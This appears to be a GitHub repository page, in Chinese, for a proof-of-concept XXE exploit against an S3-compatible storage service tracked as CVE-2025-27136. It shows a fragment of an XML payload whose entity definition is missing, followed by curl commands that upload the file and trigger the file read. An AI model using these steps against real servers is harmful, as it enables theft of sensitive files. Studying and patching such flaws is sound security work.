IssaBoudin/CVE-2025-27136
GitHub: IssaBoudin/CVE-2025-27136
针对 CVE-2025-27136 的概念验证,演示如何在 S3 存储服务中利用 XXE 漏洞读取敏感文件。
Stars: 0 | Forks: 0
# CVE-2025-27136
利用 XML 外部实体 (XXE) 漏洞。
### 使用 XML Payload 获取敏感文件 (PoC)
*test.xml*
```
]>
&xxe;
```
使用 curl 将 *test.xml* 从本地机器上传到 bucket。
```
curl -X PUT http://127.0.0.1:PORT/TB1 -H "Content-Type: application/xml" -d @test.xml
```
触发漏洞并获取文件
```
curl http://127.0.0.1:PORT/TB1?location
```
标签:AWS, Bucket, CVE-2025-27136, DPI, PoC, S3, Web安全, XML外部实体注入, XXE, XXE攻击, 云存储, 敏感文件泄露, 数据窃取, 文件读取, 暴力破解, 概念验证, 注入攻击, 网络安全, 网络安全审计, 蓝队分析, 隐私保护